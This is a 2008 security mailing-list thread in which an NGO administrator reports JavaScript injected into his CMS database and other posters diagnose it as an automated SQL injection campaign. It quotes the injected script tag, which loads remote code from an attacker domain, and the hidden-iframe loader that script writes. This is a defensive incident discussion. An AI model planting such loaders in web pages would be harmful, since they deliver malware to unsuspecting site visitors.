Incidents
Mysterious JavaScript appearance in website database Apr 14 2008 11:03PM
Glenn Gillis (glenn elaw org test-google-a com) (3 replies)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 07:26AM
Bojan Zdrnja (bojan zdrnja gmail com) (1 replies)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 07:20PM
Glenn Gillis (glenn elaw org test-google-a com)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 05:56AM
Bob Cunningham (bob cdsinc com)
Re: Mysterious JavaScript appearance in website database Apr 14 2008 11:53PM
Jon Oberheide (jon oberheide org) (1 replies)
Re: Mysterious JavaScript appearance in website database Apr 15 2008 04:49PM
Yuli Stremovsky (stremovsky gmail com)
I can advise you to update your CMS system including all plugins and
install SQL firewall.
You can use GreenSQL db firewall to protect MySQL server from SQL
injection attacks.

http://www.greensql.net/

Best regards,
Yuli

On Tue, Apr 15, 2008 at 2:53 AM, Jon Oberheide <jon (at) oberheide (dot) org [email concealed]> wrote:
> Looks like an SQL injection attack.
>
> Take a look in your MS-SQL database at the affected entries and I bet
> you'll see the nmidahena reference.
>
> Since this is a widespread, automated attack that has affected other
> sites, it's unlikely it was targeted at your specific organization or
> custom CMS. Give your codebase a thorough audit for SQL injection
> vectors.
>
> Regards,
> Jon Oberheide
>
>
>
>
> On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
> > On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
> > U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
> > the titles of much of the content on our website:
> >
> > <script src=http://www.nihaorr1.com/1.js></script>
> >
> > NB: the last modified dates for all of the content containing a
> > reference to this script are identical, right down the 1/100 second.
> >
> > The contents of the script apparently attempts to open an iframe to a
> > non-existent domain, "nmidahena.com":
> >
> > document.writeln("<iframe width=\'10\' height=\'1\'
> > src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
> >
> > I haven't found any reports of a new worm, etc. that might account for
> > this, but when I Google "nmidahena.com" I get over 100,000 hits for
> > other sites on which this script is present.
> >
> > We are running a custom-developed CMS with MS-SQL Server 2000 as the
> > backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT
> > Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes
> > released prior to NT4's end-of-life declaration by MS, for what it's worth.)
> >
> > Anyone have an idea what might have caused this?
> --
> Jon Oberheide <jon (at) oberheide (dot) org [email concealed]>
> GnuPG Key: 1024D/F47C17FE
> Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE
>

--
http://www.kyplex.com/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus